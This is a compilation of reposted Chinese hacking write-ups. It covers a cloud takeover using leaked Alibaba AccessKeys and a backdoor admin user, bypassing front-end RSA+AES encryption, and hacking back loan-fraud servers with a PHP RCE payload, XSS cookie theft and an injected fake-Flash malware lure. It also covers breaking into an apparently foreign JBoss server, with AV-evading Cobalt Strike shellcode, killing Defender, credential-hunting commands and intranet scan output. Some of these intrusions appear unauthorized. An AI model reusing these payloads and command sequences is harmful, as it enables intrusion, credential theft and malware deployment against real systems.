image-20220825160138665.png
接着开始翻配置文件
在路径 /webapps/xxx/WEB-INF/classes/ 
发现一个dbconfig.properties文件,发现了MySQL与Redis的连接信息。(要打码的东西较多,我就不放了)
MySQL是阿里云的,不是内网本地的,看了一下,发现原来打的这台机子是云主机。
白高兴一场,想着下一步就连一下MysQL看看能不能登陆SSO 以及接着翻翻看看有什么文件还有泄露配置信息然后就收工了。
mysql连接后,看到了SSO的库,以及其他3个系统的库,但当务之急是先看看能否登录SSO
查看SSO表中的sso_pwd字段
image-20220825161123156.png
发现是加密的。。。还不是普通的加密。(蚌埠住了。。)
0x03 柳暗花明
正当准备写报告收工时,一个名为 config.properties 的文件引起了我的注意。
点开查看了一下发现 what!!!
image-20220825161652464.png
SSO加密的密钥对 以及 Aliyun的accesskeyID和Secret
起飞!
0x04 解密SSO密码
RSA加密、RSA解密 - 在线工具 - OKTools
image-20220825162544727.png
密码竟然是随机生成的。。。这辈子都爆破不出来。。
登录SSO系统
image-20220825162843993.png
接着通过数据库中的其他库的密码 进入3个系统,图片我就不放了(要打码的东西太多了。。。。)。
0x05 接管云平台
前几天才看到的TeamSix师傅的文章,今天正好有现成环境复现,美滋滋。
我用 CF 打穿了他的云上内网 | T Wiki (teamssix.com)
CF工具地址:
teamssix/cf: Cloud Exploitation Framework 云环境利用框架,方便红队人员在获得 AK 的后续工作 (github.com)
cf alibaba ls
查看云资源
image-20220825164049756.png
1个bucket桶 + 2个OSS资源 + 1个ECS资源
cf alibaba console
添加后门用户接管阿里云控制台
image-20220825163327862.png
image-20220825164425766.png
访问控制中看到当前权限为:AdministratorAccess 意味着我们已经拿到了该租户的管理员权限
image-20220825164744159.png
翻一下 OSS资源以及ECS资源
OSS:
image-20220825164840765.png
ECS:
image-20220825164925978.png
image-202208251655288.png
至此,完事,写报告,收工。
0x06 总结
复现了一波AK接管云平台,感觉收获良多,相信云安全这块以后也会成为攻防演练的突破口。
此外,这次的攻击路径有点太过顺利了,不管是发现Shiro框架还是翻配置文件找到RSA密钥对和AK配置信息,我一度以为是蜜罐。。。
番外:
写报告的时候,和队友聊了一下,没想到这个站还是靶标。。。。只能说攻防演练,运气也是很重要的。。。。

原文连接: https://forum.butian.net/share/1854

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
即上次解密后,开发不死心,过了几个月,给返回包也进行了加密。并对前端js进行了压缩混淆


oohhlvxuc1q14508.png


 


 


 


根据观察,初步认为服务端也进行了相同的rsa+aes加密,然后把rsa加密后的keyiv以及aes加密的data字段一起发送回来。但是这样其实对于我们来说,反而是画蛇添足,让系统安全性下降了。因为这样会让前端去进行rsa+aes的解密,所以rsa私钥一定会存在前端


开始操作


1.老规矩搜索encryptIv字段,找到了疑似解密的部分,打上断点后提交登录请求


b1diax5ec4j14510.png


 


 


 


Burp抓包返回包,提取data字段


 


 vsihbnqrzwl14514.png


 


 


断点处提取rsa解密后的aeskeyiv


kplalbd325t14518.png


 


把从前端断点处的na作为keyiv放入鬼鬼js调试工具尝试解密,解密成功,说明思路没有问题,就是该处代码对服务器传来的encryptIvencryptKey进行解密为aes原本的密钥和偏移量


ea4s2uskjex14521.png


2.    根据解密代码,找到rsa私钥(p.d),显示不全,复制一段ctrl+f搜索到完整的rsa私钥


mkehkc3bi5i14523.png


 


 


使用jsencrypt.js脚本进行解密发现报错,原因是原版js调用了浏览器的windownavigator方法,这两个是获取浏览器窗口信息和鼠标位置信息之类的,用以生成随机数


uqcntv3ykev14525.png


 


a2zl23dn2oi14527.png


 


 


通过搜索,发现有人先做过更改原版JSEncrypt,去掉windownavigator方法使用,帖子地址:https://bbs.125.la/forum.php?mod=viewthread&tid=14113049


jho4b2adqn314529.png


使用鬼鬼js调试成功


cbyhtq4atd014534.png


 


 


3.    最后一步,完善编写自动化加解密脚本,老规矩,还是mitmweb+burp的组合,浏览器先代理到burp,然后burp二级代理到mitmweb执行python脚本,然后再发送给服务器,大致思路如


j2n5arsnoia14536.png


其实当时以为已经完成了90%了,剩下10%是编写自动化脚本,结果这10%反而花了几天时间,因为调用js解密不成功的原因。后面解决了,大体来说和aes算法以及jspython有关系。我们可以下期具体来讲讲这块大坑!今天就先跳过这部分。


最后再上次的脚本上面,加上了注销前端解密的代码,以及mitmweb帮助解密response的代码就行了。


4h12ll1pgfq14538.jpg


调试成功,burp已经舒舒服服,全程操作明文了。


qbk2qyqbm2314541.jpg


顺便,恩?发现有一个验证码返回前端的高危漏洞哈哈哈。但是我心善,既然这个加解密一时半会搞不出来的,现在都周五了,就下周一再来叫开发修复漏洞吧。具体的新增代码部分我们留到下次,和aes解密这个大坑的时候一起讲。


 


 

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
0x00 概述
  某天,一位网上朋友告诉笔者,他被骗了。被骗方式很独特,因为自己没钱所以选择贷款,在贷款过程中惨遭诈骗。
  诈骗短信:
图片
  0x01诈骗过程
(此处受害者用小辉代替)
   某日,小辉手机收到一条关于网络贷款的短信,恰逢月底,捉襟见肘,小辉没忍住诱惑下载打开了app。注册好账号,填写好身份证号、手持、工作地点、家人信息等后申请了20000元贷款,但是迟迟没到账,小辉询问客服得知:亲,这边申请贷款需要先缴纳688的VIP费用哦,缴纳后VIP费用会连同贷款金额一起打款到您的银行卡账户。小辉想了想,也不亏,于是将下个月房租开通了VIP待遇。
    小辉开通了VIP待遇,以为就能顺利贷款度过月底,但是还是没收到贷款金额以及VIP费用。这次客服主动联系小辉,"您的信用额度不够,需要再刷流水3500元,请缴纳现金证明还款能力,缴纳后费用会连同贷款金额一起打款到您的银行卡账户"。
    小辉急了,眼看着下个月房租没着落了,咬咬牙找朋友借了3500元再次打给客服提供的银行卡号,心想,这次你总没什么借口了吧!20000块钱,拿来吧你!小辉已经想好贷款下来两万块如何吃喝玩乐了~~~
    可是幸运女神还是没有照顾小辉,客服再次联系小辉,称已经审批成功即将下款,但是还需要支付3000的工本费用,且费用会连同贷款金额一起打款到银行卡账户,小辉傻眼了,紧接着,客服将后台生成的虚假的合同发送给了小辉。
图片    
小辉急了,自己就贷款而已,却损失了几千块钱还要上征信,关键贷款的钱还没到手!小辉眼看着事情越闹越大,找到了我,经过小辉的一番描述,我查看了小辉手机上的贷款软件,无奈的告诉小辉,你被骗了,钱要不回来了。小辉此刻也愣住了,流下来悔恨的泪水......
ps:以上仅为诈骗真实过程,所有细节旁白均为本人添油加醋。笔者也就此对市面上两款常见诈骗源码进行简单分析并将其记录。
0x02 漏洞分析
1.第一套源码漏洞分析
 (1) Thinkphp日志泄漏
图片
基于Thinkphp3.2.3开发,前后台分离
图片
默认开启Debug、导致泄漏日志SQL信息、异常缓存
图片构造Payload:App/Runtime/Logs/21_10_16.log
图片
获取泄漏的admin表账号密码,进入后台
图片
图片
(2) 数组可控导致RCE
可上传文件名被直接带入数据包中
图片
此处猜测后端将文件名以数组的方式进行控制(在拿到webshell后也证明了这个猜想是正确的)
将可上传的文件名加入php,随后上传拿到Webshell
查看对应配置文件,发现可上传后缀名是在数组当中,此处还可以利用插入闭合数组进行Getshell
图片
payload:siteName=11111').phpinfo();//

图片
来看看后端如何处理的,因为return array的原因 必须加上字符串连接符"."
图片
再登陆后台查看Payload是否执行
图片
2.第二套源码漏洞分析
(1)客服处Websocket-XSS
笔者能力有限,第二套诈骗贷款源码疑似一键搭建,均采用最新版宝塔+宝塔免费版WAF,在权限获取方面不足,转而向客服处寻找突破点
前台:
图片
找到客服入口,上传图片,会转到通过websocket上传的数据包
修改websocket数据包,构造XSS
图片
图片
Cookie Get
图片
三.客服系统控制/PC控制
3.1控制数据库
登陆mysql数据库查看诈骗嫌疑人登陆IP
图片
杭州的电信基站动态IP,判断是家庭路由,暂无溯源价值。
图片
0x03 控制客服系统
第一套诈骗源码的客服系统使用的是网上在线客服系统
图片
在后台翻到了客服的后台登陆地址,前端显示账号存在or密码错误,无奈账号没爆破成功。
图片
随即笔者自己注册了该客服系统,通过adminid配合uid遍历SetCookie,越权成功,拿到客服账号。
图片

中文账号==
图片
爆破拿到密码
图片
登陆客服后台
整个诈骗话术链
图片
与受害人聊天记录

图片
图片
0x04 使用flash钓鱼
在控制诈骗app服务器权限后,笔者使用flash钓鱼试图控制诈骗团伙个人PC。
在后台登陆成功后跳转的文件插入跳转js 跳转到事先准备好的假的flash更新页面
事先准备:免杀马一只 flash假域名一个(最好是包含有"flash"的字样)
<script>window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.flashxxxx.com";</script>
效果:
输入账号密码后登录,此时加载以上JavaScript。
图片
点击"确认"跳转到事先伪造的flash更新页面网站,诱导下载点击。
图片
但是最后并未上线,通过日志发现诈骗团伙是登陆了该后台的,此处也算是一个小遗憾。
0x05 总结
    网贷诈骗类案件的典型特征是,犯罪嫌疑人以“无抵押无审核”为噱头招揽需要贷款的被害人,并以“账户冻结需做解冻”才能完成放款等名义收取保证金,又以保险费、激活费、服务费等名义再次收费。被害人为了收回之前缴纳的钱款,只能按照犯罪嫌疑人为被害人设计的整个流程,完成转款,导致被害人钱款被骗。一些急需用钱的个体经营者、消费观念超前的上班族、大学生等人群是易受骗群体。
    诈骗者不仅仅将罪恶之手伸向了香港、台湾,甚至是国外......
    据分析,这群诈骗团伙在巴西也进行了相同方式的诈骗,且使用的诈骗源码为以上分析第一套源码。
图片500余名巴西受害者。
图片
图片
    天网恢恢,疏而不漏!所有行恶之人必将受到法律之严惩!




转载于原文链接: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247502166&idx=1&sn=3fe78999b5b43a059e66975dd185b3cc&chksm=ce6463cff913ead9c3a448d7466b7c38ed593a709918265283387ad4bb787292bdd2979e7d64&scene=21#wechat_redirecthttps://xz.aliyun.com/t/10391

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
工具准备
jexboss
Kali Linux
CS 4.3
Windows杀软在线查询一
Windows杀软在线查询二
Windows杀软在线查询三
fscan
潮汐shellcode免杀
LSTAR
CobaltStrike其他插件
PEASS-ng
PrintSpoofer
外网打点
1、为了练习内网横向,悄悄的盯上国外的站点
2、发现jboss网站存在反序列化漏洞,是呀jexboss无法利用成功
python jexboss.py -u https://xx.xx.xx/
3、使用工具java反序列化终极测试工具 by 6哥成功利用
yhbp4r5dbjn14774.jpg
4、查看当前用户whoami,普通用户
4c052vc3rah14775.jpg
5、查看IP地址ipconfig
4pbffdvjp5l14776.png
6、查看是否有杀软tasklist /svc
2s2mgztpam314777.jpg
7、将查询的内容粘贴到Windows杀软在线查询,发现存在杀软
i2yhase4tjb14778.png
8、查看服务器是否出网ping www.baidu.com,很不错,服务器出网
uvt24x4bcmd14779.jpg
CS上线
1、因为有杀软,我们要考虑绕过,直接上传CS木马肯定是不行的,本次绕过的是潮汐shellcode免杀,因为很多github上利用python打包的exe文件太大,上传很慢,而潮汐shellcode免杀文件较小,上传快。
2、CS先生成c语言的shellcode
mtypcozyufg14780.jpg
3、将shellcode内容复制到潮汐网站上,生成的exe上传到目标机器,然后执行命令
C:\\usr\\desarrollo\\jboss-5.1.0.GA\\server\\sigAmeServer\\deploy\\ROOT.war\\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide
pqrwxpmzxyc14782.jpg
4、CS成功上线
i5qhil2332x14783.jpg
权限提升
信息收集
1、查看当前用户及特权
whoami
whoami /priv
znzgbtj222x14784.jpg
2、查看系统版本及补丁信息
systeminfo
nq1fqbgedyu14785.jpg
Nombre de host:                            AMEPROWEBEGAD
Nombre del sistema operativo:              Microsoft Windows 10 Pro
Versi¢n del sistema operativo:             10.0.19044 N/D Compilaci¢n 19044
Fabricante del sistema operativo:          Microsoft Corporation
Configuraci¢n del sistema operativo:       Estaci¢n de trabajo miembro
Tipo de compilaci¢n del sistema operativo: Multiprocessor Free
Propiedad de:                              appzusr
Organizaci¢n registrada:                   
Id. del producto:                          00331-10000-00001-AA727
Fecha de instalaci¢n original:             13/5/2022, 14:03:47
Tiempo de arranque del sistema:            1/2/2023, 16:50:29
Fabricante del sistema:                    VMware, Inc.
Modelo el sistema:                         VMware Virtual Platform
Tipo de sistema:                           x64-based PC
Procesador(es):                            2 Procesadores instalados.
                                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
                                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
Versi¢n del BIOS:                          Phoenix Technologies LTD 6.00, 12/11/2020
Directorio de Windows:                     C:\Windows
Directorio de sistema:                     C:\Windows\system32
Dispositivo de arranque:                   \Device\HarddiskVolume1
Configuraci¢n regional del sistema:        ezs-mx;Espa¤ol (M‚xico)
Idioma de entrada:                         es-mx;Espa¤ol (M‚xico)
Zona horaria:                              (UTC-06:00) Guadalajara, Ciudad de M‚xico, Monterrey
Cantidad total de memoria f¡sica:          4.095 MB
Memoria f¡sica disponible:                 1.201 MB
Memoria virtual: tama¤o m ximo:            4.799 MB
Memoria virtual: disponible:               1.147 MB
Memoria virtual: en uso:                   3.652 MB
Ubicaci¢n(es) de archivo de paginaci¢n:    C:\pagefile.sys
Dominio:                                   ame.local
Servidor de inicio de sesi¢n:              \\AMEPROWEBEGAD
Revisi¢n(es):                              4 revisi¢n(es) instaladas.
                                           [01]: KB5004331
                                           [02]: KB5003791
                                           [03]: KB5006670
                                           [04]: KB5005699
Tarjeta(s) de red:                         1 Tarjetas de interfaz de red instaladas.
 z                                          [01]: Intel(R) PRO/1000 MT Network Connection
                                                 Nombre de conexi¢n: Ethernet0
                                                 DHCP habilitado:    No
                                                 Direcciones IP
                                                 [01]: 172.16.2.100
                                                 [02]: fe80::591:ae09:eee1:888e
Requisitos Hyper-V:                        Se detect¢ un hipervisor. No se mostrar n las caracter¡sticas necesarias para Hyper-V.
3、查看开放的端口服务netstat -ano
Conexiones activas

  Proto  Direcci¢n local          Direcci¢n remota        Estado           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       600
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1090           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:1098           0.0.0.0:0              LISTENING       7600
  TCP z   0.0.0.0:1099           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1072
  TCP    0.0.0.0:3873           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4445           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4446           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4457           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4712           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:4713           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       6652
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7070           0.0.0.0:0              LISTENING       3564
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:8080           0.0.0.0:0    z          LISTENING       7600
  TCP    0.0.0.0:8083           0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:46305          0.0.0.0:0              LISTENING       7600
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       832
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       680
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1416
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1612
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2452
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       832
  TCP    0.0.0.0:49672          0.0.0.0:0              LISTENING       3404
  TCP    0.0.0.0:49704          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49708          0.0.0.0:0              LISTENING       3048
  TCP    0.0.0.0:51407          0.0.0.0:0              LISTENING       7600
  TCP    127z.0.0.1:5140         0.0.0.0:0              LISTENING       7172
  TCP    127.0.0.1:51411        0.0.0.0:0              LISTENING       7600
  TCP    172.16.2.100:139       0.0.0.0:0              LISTENING       4
  TCP    172.16.2.100:8080      172.16.12.34:42602     TIME_WAIT       0
  TCP    172.16.2.100:8080      172.16.12.34:42610     ESTABLISHED     7600
  TCP    172.16.2.100:8080      172.16.12.34:55672     TIME_WAIT       0
  TCP    172.16.2.100:8080      172.16.12.34:55686     TIME_WAIT       0
  TCP    172.16.2.100:49717     38.90.226.62:8883      ESTABLISHED     3576
  TCP    172.16.2.100:50848     172.16.2.100:51407     TIME_WAIT       0
  TCP    172.16.2.100:51413     172.16.2.190:1433      ESTABLISHED     7600
  TCP    172.16.2.100:51447     172.16.2.190:1433      ESTABLISHED     7600
  TCP    172.16.2.100:56063     172.16.2.11:2222       ESTABLISHED     3576
  TCP    172.16.2.100:56538     92.223.66.48:443       ESTABLISHED     3564
  TCP    [::]:135               [::]:0                 LISTENINzG       600
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1090              [::]:0                 LISTENING       7600
  TCP    [::]:1098              [::]:0                 LISTENING       7600
  TCP    [::]:1099              [::]:0                 LISTENING       7600
  TCP    [::]:3389              [::]:0                 LISTENING       1072
  TCP    [::]:3873              [::]:0                 LISTENING       7600
  TCP    [::]:4444              [::]:0                 LISTENING       7600
  TCP    [::]:4445              [::]:0                 LISTENING       7600
  TCP    [::]:4446              [::]:0                 LISTENING       7600
  TCP    [::]:4457              [::]:0                 LISTENING       7600
  TCP    [::]:4712              [::]:0                 LISTENING       7600
  TCP    [::]:4713              [::]:0                 LISTENING       7600
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:8009            z  [::]:0                 LISTENING       7600
  TCP    [::]:8080              [::]:0                 LISTENING       7600
  TCP    [::]:8083              [::]:0                 LISTENING       7600
  TCP    [::]:46305             [::]:0                 LISTENING       7600
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       832
  TCP    [::]:49665             [::]:0                 LISTENING       680
  TCP    [::]:49666             [::]:0                 LISTENING       1416
  TCP    [::]:49667             [::]:0                 LISTENING       1612
  TCP    [::]:49668             [::]:0                 LISTENING       2452
  TCP    [::]:49671             [::]:0                 LISTENING       832
  TCP    [::]:49672             [::]:0                 LISTENING       3404
  TCP    [::]:49704             [::]:0                 LISTENING       820
  TCP    [::]:49708             [::]:0                 LISTENING       30z48
  TCP    [::]:51407             [::]:0                 LISTENING       7600
  UDP    0.0.0.0:123            *:*                                    1268
  UDP    0.0.0.0:500            *:*                                    3040
  UDP    0.0.0.0:3389           *:*                                    1072
  UDP    0.0.0.0:4500           *:*                                    3040
  UDP    0.0.0.0:5050           *:*                                    6652
  UDP    0.0.0.0:5353           *:*                                    1432
  UDP    0.0.0.0:5355           *:*                                    1432
  UDP    0.0.0.0:50001          *:*                                    3564
  UDP    0.0.0.0:50007          *:*                                    1240
  UDP    0.0.0.0:56152          *:*                                    1240
  UDP    0.0.0.0:61593          *:*                                    1240
  UDP    0.0.0.0:64843          *:*                                    1240
  UDP    127.0.0.1:1900         *z:*                                    2876
  UDP    127.0.0.1:50434        *:*                                    832
  UDP    127.0.0.1:55588        *:*                                    2876
  UDP    127.0.0.1:65220        *:*                                    1868
  UDP    127.0.0.1:65222        *:*                                    2360
  UDP    172.16.2.100:137       *:*                                    4
  UDP    172.16.2.100:138       *:*                                    4
  UDP    172.16.2.100:1900      *:*                                    2876
  UDP    172.16.2.100:55587     *:*                                    2876
  UDP    [::]:123               *:*                                    1268
  UDP    [::]:500               *:*                                    3040
  UDP    [::]:3389              *:*                                    1072
  UDP    [::]:4500              *:*                                    3040
  UDP    [::]:5353              *:*                                    1432
z  UDP    [::]:5355              *:*                                    1432
  UDP    [::1]:1900             *:*                                    2876
  UDP    [::1]:55586            *:*                                    2876
  UDP    [fe80::591:ae09:eee1:888e%13]:1900  *:*                                    2876
  UDP    [fe80::591:ae09:eee1:888e%13]:55585  *:*                                    2876
4、查看网卡信息shell ipconfig /all
Configuración IP de Windows

   Nombre de host. . . . . . . . . : AMEPROWEBEGAD
   Sufijo DNS principal  . . . . . : ame.local
   Tipo de nodo. . . . . . . . . . : híbrido
   Enrutamiento IP habilitado. . . : no
   Proxy WINS habilitado . . . . . : no
   Lista de búsqueda de sufijos DNS: ame.local

Adaptador de Ethernet Ethernet0:

   Sufijo DNS específico para la conexión. . : 
   Descripción . . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Dirección física. . . . . . . . . . . . . : 00-50-56-B2-9D-FE
   DHCP habilitado . . . . . . . . . . . . . : no
   Configuración automática habilitada . . . : sí
   Vínculo: dirección IPv6 local. . . : fe80::591:ae09:eee1:888e%13(Preferido) 
   Dirección IPv4. . . . . . . . . . . . . . : 172.16.2.100(Preferido) 
   Máscara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : 172.16.2.254
   IAID DHCPv6 . . . . . . . . . . . . . . . : 100683862
   DUID de cliente DHCPv6. . . . . . . . . . : 00-01-00-01-2A-10-71-A7-00-50-56-B2-9D-FE
   Servidores DNS. . . . . . . . . . . . . . : 172.16.2.20
                                       10.0.0.1
   NetBIOS sobre TCP/IP. . . . . . . . . . . : habilitado
 
1lg0i1npcua14786.jpg
5、路由表信息shell arp -a
Interfaz: 172.16.2.100 --- 0xd
  Dirección de Internet          Dirección física      Tipo
  172.16.2.11           00-50-56-b2-ac-66     dinámico  
  172.16.2.20           00-50-56-b2-d2-30     dinámico  
  172.16.2.150          00-90-a9-d6-91-01     dinámico  
  172.16.2.190          00-50-56-b2-99-b0     dinámico  
  172.16.2.254          00-00-5e-00-01-02     dinámico  
  172.16.2.255          ff-ff-ff-ff-ff-ff     estático  
  224.0.0.22            01-00-5e-00-00-16     estático  
  224.0.0.251           01-00-5e-00-00-fb     estático  
  224.0.0.252           01-00-5e-00-00-fc     estático  
  239.255.255.250       01-00-5e-7f-ff-fa     estático
0hq3l1m1elv14787.jpg
6、是否存在域环境shell systeminfo,确实存在域环境
nam0grvpf1y14789.jpg
CS自带插件提权
1、首先使用CS自带插件提权,无法提权成功,且提权后,CS就失去主机控制,应该是提权进程被杀软发现(包括第三方提权插件都不行)。
fgqiutc5zdp14791.jpg
结束杀软进程
1、我们来尝试一下是否可以关闭杀软,通过上面信息知道杀软进程名MsMpEng.exe,通过进程对比可以发现,杀软已经被我们关闭了。
tskill MsMpEng
tasklist /svc
rghwjg0uobu14792.png
Windows-Exploit-Suggester
1、安装更新脚本
python2 -m pip install --user xlrd==1.1.0
python2 windows-exploit-suggester.py --update
2、将上面收集的systeminfo内容复制到systeminfo.txt,查找对应的漏洞
python2 ./windows-exploit-suggester.py --database 2023-02-06-mssb.xls --systeminfo systeminfo.txt
fa0oxf1kpx214794.jpg
3、将查找的exp上传测试提权,发现都不成功。
PEASS-ng
1、上传到目标机器,无法执行,被杀软发现了,虽然已经关闭杀软进程,但是过一会,杀软自启动
winPEASany.exe log=result.txt
hrf21125whb14795.jpg
查看SAM密码文件
1、SAM密码文件位置
system文件位置:C:\Windows\System32\config\SYSTEM
sam文件位置:C:\Windows\System32\config\SAM
2、由于不是管理员账号,无法查看
jsm1lhx1rt514796.jpg
windows敏感文件
1、查看最近打开的文档
dir %APPDATA%\Microsoft\Windows\Recent
2、递归搜索后面文件的password字段
findstr /si password  config.*  *.ini *.txt *.properties
3、递归查找当前目录包含conf的文件
dir /a /s /b "*conf*" > 1.txt
4、递归查找目录下的txt中的password字段
findstr /s /i /c:"Password" 目录\*.txt
5、递归查找目录下的敏感文件输出到桌面123.txt中
for /r 目录 %i in (account.docx,pwd.docx,login.docx,login*.xls) do @echo  %i >> C:\tmp\123.txt
6、指定目录搜索各类敏感文件
dir /a /s /b d:\"*.txt"
dir /a /s /b d:\"*.xml"
dir /a /s /b d:\"*.mdb"
dir /a /s /b d:\"*.sql"
dir /a /s /b d:\"*.mdf"
dir /a /s /b d:\"*.eml"
dir /a /s /b d:\"*.pst"
dir /a /s /b d:\"*conf*"
dir /a /s /b d:\"*bak*"
dir /a /s /b d:\"*pwd*"
dir /a /s /b d:\"*pass*"
dir /a /s /b d:\"*login*"
dir /a /s /b d:\"*user*"
7、收集各类账号密码信息
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
PrintSpoofer提权
1、执行命令PrintSpoofer.exe -i -c cmd无法提权
PrintSpoofer.exe -i -c cmd
y2qlhw3gt2j14807.jpg
横向渗透
fscan扫描
1、上传fscan,执行shell "C:/Users/appusr/fscan64.exe" -h 172.16.2.1/24,发现存活35个IP,扫出很多网站
(icmp) Target 172.16.2.5      is alive
(icmp) Target 172.16.2.9      is alive
(icmp) Target 172.16.2.11     is alive
(icmp) Target 172.16.2.20     is alive
(icmp) Target 172.16.2.37     is alive
(icmp) Target 172.16.2.38     is alive
(icmp) Target 172.16.2.45     is alive
(icmp) Target 172.16.2.46     is alive
(icmp) Target 172.16.2.47     is alive
(icmp) Target 172.16.2.32     is alive
(icmp) Target 172.16.2.33     is alive
(icmp) Target 172.16.2.31     is alive
(icmp) Target 172.16.2.60     is alive
(icmp) Target 172.16.2.70     is alive
(icmp) Target 172.16.2.72     is alive
(icmp) Target 172.16.2.80     is alive
(icmp) Target 172.16.2.81     is alive
(icmp) Target 172.16.2.86     is alive
(icmp) Target 172.16.2.84     is alive
(icmp) Target 172.16.2.85     is alive
(icmp) Target 172.16.2.82     is alive
(icmp) Target 172.16.2.100    is alive
(icmp) Target 172.16.2.111    is alive
(icmp) Target 172.16.2.117    is alive
(icmp) Target 172.16.2.120    is alive
(icmp) Target 172.16.2.83     is alive
(icmp) Target 172.16.2.138    is alive
(icmp) Target 172.16.2.146    is alive
(icmp) Target 172.16.2.150    is alive
(icmp) Target 172.16.2.170    is alive
(icmp) Target 172.16.2.190    is alive
(icmp) Target 172.16.2.195    is alive
(icmp) Target 172.16.2.200    is alive
(icmp) Target 172.16.2.87     is alive
(icmp) Target 172.16.2.254    is alive
[*] Icmp alive hosts len is: 35
172.16.2.38:22 open
172.16.2.120:21 open
172.16.2.20:22 open
172.16.2.37:22 open
172.16.2.150:21 open
172.16.2.117:22 open
172.16.2.82:22 open
172.16.2.111:22 open
172.16.2.81:22 open
172.16.2.72:22 open
172.16.2.70:22 open
172.16.2.45:21 open
172.16.2.60:22 open
172.16.2.37:80 open
172.16.2.11:80 open
172.16.2.200:22 open
172.16.2.83:22 open
172.16.2.150:22 open
172.16.2.170:22 open
172.16.2.146:22 open
172.16.2.138:22 open
172.16.2.120:80 open
172.16.2.84:80 open
172.16.2.81:80 open
172.16.2.85:80 open
172.16.2.86:80 open
172.16.2.70:80 open
172.16.2.60:80 open
172.16.2.87:22 open
172.16.2.11:135 open
172.16.2.20:135 open
172.16.2.5:135 open
172.16.2.83:80 open
172.16.2.200:80 open
172.16.2.170:80 open
172.16.2.82:80 open
172.16.2.117:80 open
172.16.2.11:139 open
172.16.2.20:139 open
172.16.2.9:139 open
172.16.2.5:139 open
172.16.2.195:135 open
172.16.2.190:135 open
172.16.2.100:135 open
172.16.2.84:135 open
172.16.2.195:139 open
172.16.2.190:139 open
172.16.2.170:139 open
172.16.2.150:139 open
172.16.2.120:139 open
172.16.2.100:139 open
172.16.2.84:139 open
172.16.2.60:139 open
172.16.2.84:443 open
172.16.2.85:443 open
172.16.2.86:443 open
172.16.2.80:443 open
172.16.2.72:443 open
172.16.2.70:443 open
172.16.2.60:443 open
172.16.2.11:443 open
172.16.2.87:443 open
172.16.2.9:445 open
172.16.2.5:445 open
172.16.2.170:443 open
172.16.2.83:443 open
172.16.2.120:443 open
172.16.2.82:443 open
172.16.2.81:443 open
172.16.2.170:445 open
172.16.2.150:445 open
172.16.2.120:445 open
172.16.2.100:445 open
172.16.2.84:445 open
172.16.2.60:445 open
172.16.2.20:445 open
172.16.2.11:445 open
172.16.2.5:5432 open
172.16.2.138:3306 open
172.16.2.38:3306 open
172.16.2.195:1433 open
172.16.2.190:1433 open
172.16.2.11:1433 open
172.16.2.195:445 open
172.16.2.190:445 open
172.16.2.100:8080 open
172.16.2.45:8080 open
172.16.2.9:135 open
172.16.2.86:8000 open
172.16.2.80:80 open
172.16.2.200:5432 open
172.16.2.111:5432 open
172.16.2.120:8080 open
172.16.2.150:9000 open
172.16.2.9:5432 open
172.16.2.85:8000 open

[+] received output:
172.16.2.20:88 open

[+] received output:
172.16.2.100:1099 open
172.16.2.80:2020 open
172.16.2.11:3128 open
172.16.2.120:3128 open

[+] received output:
172.16.2.11:7070 open
172.16.2.70:7070 open
172.16.2.100:7070 open
172.16.2.84:7070 open
172.16.2.100:8009 open

[+] received output:
172.16.2.120:8081 open
172.16.2.100:8083 open
172.16.2.80:8084 open

[+] received output:
172.16.2.72:8200 open
172.16.2.86:8300 open
172.16.2.85:8300 open
172.16.2.20:8443 open

[+] received output:
172.16.2.86:9080 open
